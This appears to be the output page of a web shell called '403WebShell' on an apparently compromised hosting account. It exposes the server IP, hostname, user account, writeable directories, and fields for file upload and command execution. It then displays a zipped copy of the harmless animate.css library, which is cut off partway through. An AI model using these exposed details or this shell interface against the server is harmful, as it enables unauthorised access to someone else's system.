Done ! 403WebShell
403Webshell
Server IP : 46.105.57.169  /  Your IP : 216.73.217.35
Web Server : Apache
System : Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaumee ( 152031)
PHP Version : 8.5.7
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/verseaumee/123click/assets/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/verseaumee/123click/assets/plugins1.zip
PK!�׸þ/�/animate-css/animate.cssnu&1i�@charset "UTF-8";

/*!
 * animate.css -http://daneden.me/animate
 * Version - 3.7.0
 * Licensed under the MIT license - http://opensource.org/licenses/MIT
 *
 * Copyright (c) 2018 Daniel Eden
 */

@-webkit-keyframes bounce {
  from,
  20%,
  53%,
  80%,
  to {
    -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  40%,
  43% {
    -webkit-animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
    animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
    -webkit-transform: translate3d(0, -30px, 0);
    transform: translate3d(0, -30px, 0);
  }

  70% {
    -webkit-animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
    animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
    -webkit-transform: translate3d(0, -15px, 0);
    transform: translate3d(0, -15px, 0);
  }

  90% {
    -webkit-transform: translate3d(0, -4px, 0);
    transform: translate3d(0, -4px, 0);
  }
}

@keyframes bounce {
  from,
  20%,
  53%,
  80%,
  to {
    -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  40%,
  43% {
    -webkit-animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
    animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
    -webkit-transform: translate3d(0, -30px, 0);
    transform: translate3d(0, -30px, 0);
  }

  70% {
    -webkit-animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
    animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
    -webkit-transform: translate3d(0, -15px, 0);
    transform: translate3d(0, -15px, 0);
  }

  90% {
    -webkit-transform: translate3d(0, -4px, 0);
    transform: translate3d(0, -4px, 0);
  }
}

.bounce {
  -webkit-animation-name: bounce;
  animation-name: bounce;
  -webkit-transform-origin: center bottom;
  transform-origin: center bottom;
}

@-webkit-keyframes flash {
  from,
  50%,
  to {
    opacity: 1;
  }

  25%,
  75% {
    opacity: 0;
  }
}

@keyframes flash {
  from,
  50%,
  to {
    opacity: 1;
  }

  25%,
  75% {
    opacity: 0;
  }
}

.flash {
  -webkit-animation-name: flash;
  animation-name: flash;
}

/* originally authored by Nick Pettit - https://github.com/nickpettit/glide */

@-webkit-keyframes pulse {
  from {
    -webkit-transform: scale3d(1, 1, 1);
    transform: scale3d(1, 1, 1);
  }

  50% {
    -webkit-transform: scale3d(1.05, 1.05, 1.05);
    transform: scale3d(1.05, 1.05, 1.05);
  }

  to {
    -webkit-transform: scale3d(1, 1, 1);
    transform: scale3d(1, 1, 1);
  }
}

@keyframes pulse {
  from {
    -webkit-transform: scale3d(1, 1, 1);
    transform: scale3d(1, 1, 1);
  }

  50% {
    -webkit-transform: scale3d(1.05, 1.05, 1.05);
    transform: scale3d(1.05, 1.05, 1.05);
  }

  to {
    -webkit-transform: scale3d(1, 1, 1);
    transform: scale3d(1, 1, 1);
  }
}

.pulse {
  -webkit-animation-name: pulse;
  animation-name: pulse;
}

@-webkit-keyframes rubberBand {
  from {
    -webkit-transform: scale3d(1, 1, 1);
    transform: scale3d(1, 1, 1);
  }

  30% {
    -webkit-transform: scale3d(1.25, 0.75, 1);
    transform: scale3d(1.25, 0.75, 1);
  }

  40% {
    -webkit-transform: scale3d(0.75, 1.25, 1);
    transform: scale3d(0.75, 1.25, 1);
  }

  50% {
    -webkit-transform: scale3d(1.15, 0.85, 1);
    transform: scale3d(1.15, 0.85, 1);
  }

  65% {
    -webkit-transform: scale3d(0.95, 1.05, 1);
    transform: scale3d(0.95, 1.05, 1);
  }

  75% {
    -webkit-transform: scale3d(1.05, 0.95, 1);
    transform: scale3d(1.05, 0.95, 1);
  }

  to {
    -webkit-transform: scale3d(1, 1, 1);
    transform: scale3d(1, 1, 1);
  }
}

@keyframes rubberBand {
  from {
    -webkit-transform: scale3d(1, 1, 1);
    transform: scale3d(1, 1, 1);
  }

  30% {
    -webkit-transform: scale3d(1.25, 0.75, 1);
    transform: scale3d(1.25, 0.75, 1);
  }

  40% {
    -webkit-transform: scale3d(0.75, 1.25, 1);
    transform: scale3d(0.75, 1.25, 1);
  }

  50% {
    -webkit-transform: scale3d(1.15, 0.85, 1);
    transform: scale3d(1.15, 0.85, 1);
  }

  65% {
    -webkit-transform: scale3d(0.95, 1.05, 1);
    transform: scale3d(0.95, 1.05, 1);
  }

  75% {
    -webkit-transform: scale3d(1.05, 0.95, 1);
    transform: scale3d(1.05, 0.95, 1);
  }

  to {
    -webkit-transform: scale3d(1, 1, 1);
    transform: scale3d(1, 1, 1);
  }
}

.rubberBand {
  -webkit-animation-name: rubberBand;
  animation-name: rubberBand;
}

@-webkit-keyframes shake {
  from,
  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  10%,
  30%,
  50%,
  70%,
  90% {
    -webkit-transform: translate3d(-10px, 0, 0);
    transform: translate3d(-10px, 0, 0);
  }

  20%,
  40%,
  60%,
  80% {
    -webkit-transform: translate3d(10px, 0, 0);
    transform: translate3d(10px, 0, 0);
  }
}

@keyframes shake {
  from,
  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  10%,
  30%,
  50%,
  70%,
  90% {
    -webkit-transform: translate3d(-10px, 0, 0);
    transform: translate3d(-10px, 0, 0);
  }

  20%,
  40%,
  60%,
  80% {
    -webkit-transform: translate3d(10px, 0, 0);
    transform: translate3d(10px, 0, 0);
  }
}

.shake {
  -webkit-animation-name: shake;
  animation-name: shake;
}

@-webkit-keyframes headShake {
  0% {
    -webkit-transform: translateX(0);
    transform: translateX(0);
  }

  6.5% {
    -webkit-transform: translateX(-6px) rotateY(-9deg);
    transform: translateX(-6px) rotateY(-9deg);
  }

  18.5% {
    -webkit-transform: translateX(5px) rotateY(7deg);
    transform: translateX(5px) rotateY(7deg);
  }

  31.5% {
    -webkit-transform: translateX(-3px) rotateY(-5deg);
    transform: translateX(-3px) rotateY(-5deg);
  }

  43.5% {
    -webkit-transform: translateX(2px) rotateY(3deg);
    transform: translateX(2px) rotateY(3deg);
  }

  50% {
    -webkit-transform: translateX(0);
    transform: translateX(0);
  }
}

@keyframes headShake {
  0% {
    -webkit-transform: translateX(0);
    transform: translateX(0);
  }

  6.5% {
    -webkit-transform: translateX(-6px) rotateY(-9deg);
    transform: translateX(-6px) rotateY(-9deg);
  }

  18.5% {
    -webkit-transform: translateX(5px) rotateY(7deg);
    transform: translateX(5px) rotateY(7deg);
  }

  31.5% {
    -webkit-transform: translateX(-3px) rotateY(-5deg);
    transform: translateX(-3px) rotateY(-5deg);
  }

  43.5% {
    -webkit-transform: translateX(2px) rotateY(3deg);
    transform: translateX(2px) rotateY(3deg);
  }

  50% {
    -webkit-transform: translateX(0);
    transform: translateX(0);
  }
}

.headShake {
  -webkit-animation-timing-function: ease-in-out;
  animation-timing-function: ease-in-out;
  -webkit-animation-name: headShake;
  animation-name: headShake;
}

@-webkit-keyframes swing {
  20% {
    -webkit-transform: rotate3d(0, 0, 1, 15deg);
    transform: rotate3d(0, 0, 1, 15deg);
  }

  40% {
    -webkit-transform: rotate3d(0, 0, 1, -10deg);
    transform: rotate3d(0, 0, 1, -10deg);
  }

  60% {
    -webkit-transform: rotate3d(0, 0, 1, 5deg);
    transform: rotate3d(0, 0, 1, 5deg);
  }

  80% {
    -webkit-transform: rotate3d(0, 0, 1, -5deg);
    transform: rotate3d(0, 0, 1, -5deg);
  }

  to {
    -webkit-transform: rotate3d(0, 0, 1, 0deg);
    transform: rotate3d(0, 0, 1, 0deg);
  }
}

@keyframes swing {
  20% {
    -webkit-transform: rotate3d(0, 0, 1, 15deg);
    transform: rotate3d(0, 0, 1, 15deg);
  }

  40% {
    -webkit-transform: rotate3d(0, 0, 1, -10deg);
    transform: rotate3d(0, 0, 1, -10deg);
  }

  60% {
    -webkit-transform: rotate3d(0, 0, 1, 5deg);
    transform: rotate3d(0, 0, 1, 5deg);
  }

  80% {
    -webkit-transform: rotate3d(0, 0, 1, -5deg);
    transform: rotate3d(0, 0, 1, -5deg);
  }

  to {
    -webkit-transform: rotate3d(0, 0, 1, 0deg);
    transform: rotate3d(0, 0, 1, 0deg);
  }
}

.swing {
  -webkit-transform-origin: top center;
  transform-origin: top center;
  -webkit-animation-name: swing;
  animation-name: swing;
}

@-webkit-keyframes tada {
  from {
    -webkit-transform: scale3d(1, 1, 1);
    transform: scale3d(1, 1, 1);
  }

  10%,
  20% {
    -webkit-transform: scale3d(0.9, 0.9, 0.9) rotate3d(0, 0, 1, -3deg);
    transform: scale3d(0.9, 0.9, 0.9) rotate3d(0, 0, 1, -3deg);
  }

  30%,
  50%,
  70%,
  90% {
    -webkit-transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, 3deg);
    transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, 3deg);
  }

  40%,
  60%,
  80% {
    -webkit-transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, -3deg);
    transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, -3deg);
  }

  to {
    -webkit-transform: scale3d(1, 1, 1);
    transform: scale3d(1, 1, 1);
  }
}

@keyframes tada {
  from {
    -webkit-transform: scale3d(1, 1, 1);
    transform: scale3d(1, 1, 1);
  }

  10%,
  20% {
    -webkit-transform: scale3d(0.9, 0.9, 0.9) rotate3d(0, 0, 1, -3deg);
    transform: scale3d(0.9, 0.9, 0.9) rotate3d(0, 0, 1, -3deg);
  }

  30%,
  50%,
  70%,
  90% {
    -webkit-transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, 3deg);
    transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, 3deg);
  }

  40%,
  60%,
  80% {
    -webkit-transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, -3deg);
    transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, -3deg);
  }

  to {
    -webkit-transform: scale3d(1, 1, 1);
    transform: scale3d(1, 1, 1);
  }
}

.tada {
  -webkit-animation-name: tada;
  animation-name: tada;
}

/* originally authored by Nick Pettit - https://github.com/nickpettit/glide */

@-webkit-keyframes wobble {
  from {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  15% {
    -webkit-transform: translate3d(-25%, 0, 0) rotate3d(0, 0, 1, -5deg);
    transform: translate3d(-25%, 0, 0) rotate3d(0, 0, 1, -5deg);
  }

  30% {
    -webkit-transform: translate3d(20%, 0, 0) rotate3d(0, 0, 1, 3deg);
    transform: translate3d(20%, 0, 0) rotate3d(0, 0, 1, 3deg);
  }

  45% {
    -webkit-transform: translate3d(-15%, 0, 0) rotate3d(0, 0, 1, -3deg);
    transform: translate3d(-15%, 0, 0) rotate3d(0, 0, 1, -3deg);
  }

  60% {
    -webkit-transform: translate3d(10%, 0, 0) rotate3d(0, 0, 1, 2deg);
    transform: translate3d(10%, 0, 0) rotate3d(0, 0, 1, 2deg);
  }

  75% {
    -webkit-transform: translate3d(-5%, 0, 0) rotate3d(0, 0, 1, -1deg);
    transform: translate3d(-5%, 0, 0) rotate3d(0, 0, 1, -1deg);
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes wobble {
  from {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  15% {
    -webkit-transform: translate3d(-25%, 0, 0) rotate3d(0, 0, 1, -5deg);
    transform: translate3d(-25%, 0, 0) rotate3d(0, 0, 1, -5deg);
  }

  30% {
    -webkit-transform: translate3d(20%, 0, 0) rotate3d(0, 0, 1, 3deg);
    transform: translate3d(20%, 0, 0) rotate3d(0, 0, 1, 3deg);
  }

  45% {
    -webkit-transform: translate3d(-15%, 0, 0) rotate3d(0, 0, 1, -3deg);
    transform: translate3d(-15%, 0, 0) rotate3d(0, 0, 1, -3deg);
  }

  60% {
    -webkit-transform: translate3d(10%, 0, 0) rotate3d(0, 0, 1, 2deg);
    transform: translate3d(10%, 0, 0) rotate3d(0, 0, 1, 2deg);
  }

  75% {
    -webkit-transform: translate3d(-5%, 0, 0) rotate3d(0, 0, 1, -1deg);
    transform: translate3d(-5%, 0, 0) rotate3d(0, 0, 1, -1deg);
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.wobble {
  -webkit-animation-name: wobble;
  animation-name: wobble;
}

@-webkit-keyframes jello {
  from,
  11.1%,
  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  22.2% {
    -webkit-transform: skewX(-12.5deg) skewY(-12.5deg);
    transform: skewX(-12.5deg) skewY(-12.5deg);
  }

  33.3% {
    -webkit-transform: skewX(6.25deg) skewY(6.25deg);
    transform: skewX(6.25deg) skewY(6.25deg);
  }

  44.4% {
    -webkit-transform: skewX(-3.125deg) skewY(-3.125deg);
    transform: skewX(-3.125deg) skewY(-3.125deg);
  }

  55.5% {
    -webkit-transform: skewX(1.5625deg) skewY(1.5625deg);
    transform: skewX(1.5625deg) skewY(1.5625deg);
  }

  66.6% {
    -webkit-transform: skewX(-0.78125deg) skewY(-0.78125deg);
    transform: skewX(-0.78125deg) skewY(-0.78125deg);
  }

  77.7% {
    -webkit-transform: skewX(0.390625deg) skewY(0.390625deg);
    transform: skewX(0.390625deg) skewY(0.390625deg);
  }

  88.8% {
    -webkit-transform: skewX(-0.1953125deg) skewY(-0.1953125deg);
    transform: skewX(-0.1953125deg) skewY(-0.1953125deg);
  }
}

@keyframes jello {
  from,
  11.1%,
  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }

  22.2% {
    -webkit-transform: skewX(-12.5deg) skewY(-12.5deg);
    transform: skewX(-12.5deg) skewY(-12.5deg);
  }

  33.3% {
    -webkit-transform: skewX(6.25deg) skewY(6.25deg);
    transform: skewX(6.25deg) skewY(6.25deg);
  }

  44.4% {
    -webkit-transform: skewX(-3.125deg) skewY(-3.125deg);
    transform: skewX(-3.125deg) skewY(-3.125deg);
  }

  55.5% {
    -webkit-transform: skewX(1.5625deg) skewY(1.5625deg);
    transform: skewX(1.5625deg) skewY(1.5625deg);
  }

  66.6% {
    -webkit-transform: skewX(-0.78125deg) skewY(-0.78125deg);
    transform: skewX(-0.78125deg) skewY(-0.78125deg);
  }

  77.7% {
    -webkit-transform: skewX(0.390625deg) skewY(0.390625deg);
    transform: skewX(0.390625deg) skewY(0.390625deg);
  }

  88.8% {
    -webkit-transform: skewX(-0.1953125deg) skewY(-0.1953125deg);
    transform: skewX(-0.1953125deg) skewY(-0.1953125deg);
  }
}

.jello {
  -webkit-animation-name: jello;
  animation-name: jello;
  -webkit-transform-origin: center;
  transform-origin: center;
}

@-webkit-keyframes heartBeat {
  0% {
    -webkit-transform: scale(1);
    transform: scale(1);
  }

  14% {
    -webkit-transform: scale(1.3);
    transform: scale(1.3);
  }

  28% {
    -webkit-transform: scale(1);
    transform: scale(1);
  }

  42% {
    -webkit-transform: scale(1.3);
    transform: scale(1.3);
  }

  70% {
    -webkit-transform: scale(1);
    transform: scale(1);
  }
}

@keyframes heartBeat {
  0% {
    -webkit-transform: scale(1);
    transform: scale(1);
  }

  14% {
    -webkit-transform: scale(1.3);
    transform: scale(1.3);
  }

  28% {
    -webkit-transform: scale(1);
    transform: scale(1);
  }

  42% {
    -webkit-transform: scale(1.3);
    transform: scale(1.3);
  }

  70% {
    -webkit-transform: scale(1);
    transform: scale(1);
  }
}

.heartBeat {
  -webkit-animation-name: heartBeat;
  animation-name: heartBeat;
  -webkit-animation-duration: 1.3s;
  animation-duration: 1.3s;
  -webkit-animation-timing-function: ease-in-out;
  animation-timing-function: ease-in-out;
}

@-webkit-keyframes bounceIn {
  from,
  20%,
  40%,
  60%,
  80%,
  to {
    -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
  }

  0% {
    opacity: 0;
    -webkit-transform: scale3d(0.3, 0.3, 0.3);
    transform: scale3d(0.3, 0.3, 0.3);
  }

  20% {
    -webkit-transform: scale3d(1.1, 1.1, 1.1);
    transform: scale3d(1.1, 1.1, 1.1);
  }

  40% {
    -webkit-transform: scale3d(0.9, 0.9, 0.9);
    transform: scale3d(0.9, 0.9, 0.9);
  }

  60% {
    opacity: 1;
    -webkit-transform: scale3d(1.03, 1.03, 1.03);
    transform: scale3d(1.03, 1.03, 1.03);
  }

  80% {
    -webkit-transform: scale3d(0.97, 0.97, 0.97);
    transform: scale3d(0.97, 0.97, 0.97);
  }

  to {
    opacity: 1;
    -webkit-transform: scale3d(1, 1, 1);
    transform: scale3d(1, 1, 1);
  }
}

@keyframes bounceIn {
  from,
  20%,
  40%,
  60%,
  80%,
  to {
    -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
  }

  0% {
    opacity: 0;
    -webkit-transform: scale3d(0.3, 0.3, 0.3);
    transform: scale3d(0.3, 0.3, 0.3);
  }

  20% {
    -webkit-transform: scale3d(1.1, 1.1, 1.1);
    transform: scale3d(1.1, 1.1, 1.1);
  }

  40% {
    -webkit-transform: scale3d(0.9, 0.9, 0.9);
    transform: scale3d(0.9, 0.9, 0.9);
  }

  60% {
    opacity: 1;
    -webkit-transform: scale3d(1.03, 1.03, 1.03);
    transform: scale3d(1.03, 1.03, 1.03);
  }

  80% {
    -webkit-transform: scale3d(0.97, 0.97, 0.97);
    transform: scale3d(0.97, 0.97, 0.97);
  }

  to {
    opacity: 1;
    -webkit-transform: scale3d(1, 1, 1);
    transform: scale3d(1, 1, 1);
  }
}

.bounceIn {
  -webkit-animation-duration: 0.75s;
  animation-duration: 0.75s;
  -webkit-animation-name: bounceIn;
  animation-name: bounceIn;
}

@-webkit-keyframes bounceInDown {
  from,
  60%,
  75%,
  90%,
  to {
    -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
  }

  0% {
    opacity: 0;
    -webkit-transform: translate3d(0, -3000px, 0);
    transform: translate3d(0, -3000px, 0);
  }

  60% {
    opacity: 1;
    -webkit-transform: translate3d(0, 25px, 0);
    transform: translate3d(0, 25px, 0);
  }

  75% {
    -webkit-transform: translate3d(0, -10px, 0);
    transform: translate3d(0, -10px, 0);
  }

  90% {
    -webkit-transform: translate3d(0, 5px, 0);
    transform: translate3d(0, 5px, 0);
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes bounceInDown {
  from,
  60%,
  75%,
  90%,
  to {
    -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
  }

  0% {
    opacity: 0;
    -webkit-transform: translate3d(0, -3000px, 0);
    transform: translate3d(0, -3000px, 0);
  }

  60% {
    opacity: 1;
    -webkit-transform: translate3d(0, 25px, 0);
    transform: translate3d(0, 25px, 0);
  }

  75% {
    -webkit-transform: translate3d(0, -10px, 0);
    transform: translate3d(0, -10px, 0);
  }

  90% {
    -webkit-transform: translate3d(0, 5px, 0);
    transform: translate3d(0, 5px, 0);
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.bounceInDown {
  -webkit-animation-name: bounceInDown;
  animation-name: bounceInDown;
}

@-webkit-keyframes bounceInLeft {
  from,
  60%,
  75%,
  90%,
  to {
    -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
  }

  0% {
    opacity: 0;
    -webkit-transform: translate3d(-3000px, 0, 0);
    transform: translate3d(-3000px, 0, 0);
  }

  60% {
    opacity: 1;
    -webkit-transform: translate3d(25px, 0, 0);
    transform: translate3d(25px, 0, 0);
  }

  75% {
    -webkit-transform: translate3d(-10px, 0, 0);
    transform: translate3d(-10px, 0, 0);
  }

  90% {
    -webkit-transform: translate3d(5px, 0, 0);
    transform: translate3d(5px, 0, 0);
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes bounceInLeft {
  from,
  60%,
  75%,
  90%,
  to {
    -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
  }

  0% {
    opacity: 0;
    -webkit-transform: translate3d(-3000px, 0, 0);
    transform: translate3d(-3000px, 0, 0);
  }

  60% {
    opacity: 1;
    -webkit-transform: translate3d(25px, 0, 0);
    transform: translate3d(25px, 0, 0);
  }

  75% {
    -webkit-transform: translate3d(-10px, 0, 0);
    transform: translate3d(-10px, 0, 0);
  }

  90% {
    -webkit-transform: translate3d(5px, 0, 0);
    transform: translate3d(5px, 0, 0);
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.bounceInLeft {
  -webkit-animation-name: bounceInLeft;
  animation-name: bounceInLeft;
}

@-webkit-keyframes bounceInRight {
  from,
  60%,
  75%,
  90%,
  to {
    -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
  }

  from {
    opacity: 0;
    -webkit-transform: translate3d(3000px, 0, 0);
    transform: translate3d(3000px, 0, 0);
  }

  60% {
    opacity: 1;
    -webkit-transform: translate3d(-25px, 0, 0);
    transform: translate3d(-25px, 0, 0);
  }

  75% {
    -webkit-transform: translate3d(10px, 0, 0);
    transform: translate3d(10px, 0, 0);
  }

  90% {
    -webkit-transform: translate3d(-5px, 0, 0);
    transform: translate3d(-5px, 0, 0);
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes bounceInRight {
  from,
  60%,
  75%,
  90%,
  to {
    -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
  }

  from {
    opacity: 0;
    -webkit-transform: translate3d(3000px, 0, 0);
    transform: translate3d(3000px, 0, 0);
  }

  60% {
    opacity: 1;
    -webkit-transform: translate3d(-25px, 0, 0);
    transform: translate3d(-25px, 0, 0);
  }

  75% {
    -webkit-transform: translate3d(10px, 0, 0);
    transform: translate3d(10px, 0, 0);
  }

  90% {
    -webkit-transform: translate3d(-5px, 0, 0);
    transform: translate3d(-5px, 0, 0);
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.bounceInRight {
  -webkit-animation-name: bounceInRight;
  animation-name: bounceInRight;
}

@-webkit-keyframes bounceInUp {
  from,
  60%,
  75%,
  90%,
  to {
    -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
  }

  from {
    opacity: 0;
    -webkit-transform: translate3d(0, 3000px, 0);
    transform: translate3d(0, 3000px, 0);
  }

  60% {
    opacity: 1;
    -webkit-transform: translate3d(0, -20px, 0);
    transform: translate3d(0, -20px, 0);
  }

  75% {
    -webkit-transform: translate3d(0, 10px, 0);
    transform: translate3d(0, 10px, 0);
  }

  90% {
    -webkit-transform: translate3d(0, -5px, 0);
    transform: translate3d(0, -5px, 0);
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

@keyframes bounceInUp {
  from,
  60%,
  75%,
  90%,
  to {
    -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
  }

  from {
    opacity: 0;
    -webkit-transform: translate3d(0, 3000px, 0);
    transform: translate3d(0, 3000px, 0);
  }

  60% {
    opacity: 1;
    -webkit-transform: translate3d(0, -20px, 0);
    transform: translate3d(0, -20px, 0);
  }

  75% {
    -webkit-transform: translate3d(0, 10px, 0);
    transform: translate3d(0, 10px, 0);
  }

  90% {
    -webkit-transform: translate3d(0, -5px, 0);
    transform: translate3d(0, -5px, 0);
  }

  to {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
  }
}

.bounceInUp {
  -webkit-animation-name: bounceInUp;
  animation-name: bounceInUp;
}

@-webkit-keyframes bounceOut {
  20% {
    -webkit-transform: scale3d(0.9, 0.9, 0.9);
    transform: scale3d(0.9, 0.9, 0.9);
  }

  50%,
  55% {
    opacity: 1;
    -webkit-transform: scale3d(1.1, 1.1, 1.1);
    transform: scale3d(1.1, 1.1, 1.1);
  }

  to {
    opacity: 0;
    -webkit-transform: scale3d(0.3, 0.3, 0.3);
    transform: scale3d(0.3, 0.3, 0.3);
  }
}

@keyframes bounceOut {
  20% {
    -webkit-transform: scale3d(0.9, 0.9, 0.9);
    transform: scale3d(0.9, 0.9, 0.9);
  }

  50%,
  55% {
    opacity: 1;
    -webkit-transform: scale3d(1.1, 1.1, 1.1);
    transform: scale3d(1.1, 1.1, 1.1);
  }

  to {
    opacity: 0;
    -webkit-transform: scale3d(0.3, 0.3, 0.3);
    transform: scale3d(0.3, 0.3, 0.3);
  }
}

.bounceOut {
  -webkit-animation-duration: 0.75s;
  animation-duration: 0.75s;
  -webkit-animation-name: bounceOut;
  animation-name: bounceOut;
}

@-webkit-keyframes bounceOutDown {
  20% {
    -webkit-transform: translate3d(0, 10px, 0);
    transform: translate3d(0, 10px, 0);
  }

  40%,
  45% {
    opacity: 1;
    -webkit-transform: translate3d(0, -20px, 0);
    transform: translate3d(0, -20px, 0);
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(0, 2000px, 0);
    transform: translate3d(0, 2000px, 0);
  }
}

@keyframes bounceOutDown {
  20% {
    -webkit-transform: translate3d(0, 10px, 0);
    transform: translate3d(0, 10px, 0);
  }

  40%,
  45% {
    opacity: 1;
    -webkit-transform: translate3d(0, -20px, 0);
    transform: translate3d(0, -20px, 0);
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(0, 2000px, 0);
    transform: translate3d(0, 2000px, 0);
  }
}

.bounceOutDown {
  -webkit-animation-name: bounceOutDown;
  animation-name: bounceOutDown;
}

@-webkit-keyframes bounceOutLeft {
  20% {
    opacity: 1;
    -webkit-transform: translate3d(20px, 0, 0);
    transform: translate3d(20px, 0, 0);
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(-2000px, 0, 0);
    transform: translate3d(-2000px, 0, 0);
  }
}

@keyframes bounceOutLeft {
  20% {
    opacity: 1;
    -webkit-transform: translate3d(20px, 0, 0);
    transform: translate3d(20px, 0, 0);
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(-2000px, 0, 0);
    transform: translate3d(-2000px, 0, 0);
  }
}

.bounceOutLeft {
  -webkit-animation-name: bounceOutLeft;
  animation-name: bounceOutLeft;
}

@-webkit-keyframes bounceOutRight {
  20% {
    opacity: 1;
    -webkit-transform: translate3d(-20px, 0, 0);
    transform: translate3d(-20px, 0, 0);
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(2000px, 0, 0);
    transform: translate3d(2000px, 0, 0);
  }
}

@keyframes bounceOutRight {
  20% {
    opacity: 1;
    -webkit-transform: translate3d(-20px, 0, 0);
    transform: translate3d(-20px, 0, 0);
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(2000px, 0, 0);
    transform: translate3d(2000px, 0, 0);
  }
}

.bounceOutRight {
  -webkit-animation-name: bounceOutRight;
  animation-name: bounceOutRight;
}

@-webkit-keyframes bounceOutUp {
  20% {
    -webkit-transform: translate3d(0, -10px, 0);
    transform: translate3d(0, -10px, 0);
  }

  40%,
  45% {
    opacity: 1;
    -webkit-transform: translate3d(0, 20px, 0);
    transform: translate3d(0, 20px, 0);
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(0, -2000px, 0);
    transform: translate3d(0, -2000px, 0);
  }
}

@keyframes bounceOutUp {
  20% {
    -webkit-transform: translate3d(0, -10px, 0);
    transform: translate3d(0, -10px, 0);
  }

  40%,
  45% {
    opacity: 1;
    -webkit-transform: translate3d(0, 20px, 0);
    transform: translate3d(0, 20px, 0);
  }

  to {
    opacity: 0;
    -webkit-transform: translate3d(0, -2000px, 0);
    transform: translate3d(0, -2000px, 0);
  }
}

.bounceOutUp {
  -webkit-animation-name: bounceOutUp;
  animation-name: bounceOutUp;
}

@-webkit-keyframes fadeIn {
  from {
